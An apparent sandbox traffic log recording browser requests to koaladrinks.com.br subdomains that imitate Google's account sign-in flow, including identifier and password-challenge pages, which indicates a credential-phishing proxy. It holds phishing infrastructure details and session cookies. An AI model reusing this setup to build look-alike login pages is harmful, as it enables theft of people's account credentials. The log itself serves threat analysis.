Source: global trafficHTTP traffic detected: GET /_/bscframe HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ZwDk9d,RMhBfe HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=iAskyc,ziXSP HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Fijgbload.koaladrinks.com.br&v=1920793691&timestamp=1736497668863 HTTP/1.1Host: yt-sub.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=P6sQOc HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=wg1P6b HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&_reqid=112469&rt=c HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /v3/signin/_/AccountsSignInUi/browserinfo?f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&_reqid=12469&rt=j HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=wg1P6b HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=V1UmUe&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&_reqid=212469&rt=c HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wwws.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
Source: global trafficHTTP traffic detected: GET /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=WZfWSd%2CAho3hb%2Ci3kFoc%2CzKAP2e%2CRzSO2e&source-path=%2Fv3%2Fsignin%2Fchallenge%2Fpwd&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&_reqid=312469&rt=c HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=WW16bk8xhCKjLDzRMeKzleiHWeQ91IpeSlEndb-VpZL_gD5Yk1zwK_l2GrQDgUalD8_AM6emji9sq9EGwuKfaPf88fJvThafZPIhylhin4dskLYLY1kD5NOTq8DD0VvF9XJIuZfO5U2GVyp-Wh9bwFsZBcTa3CrR_i6GMtJcVhv0q92EBc4
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wwws.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
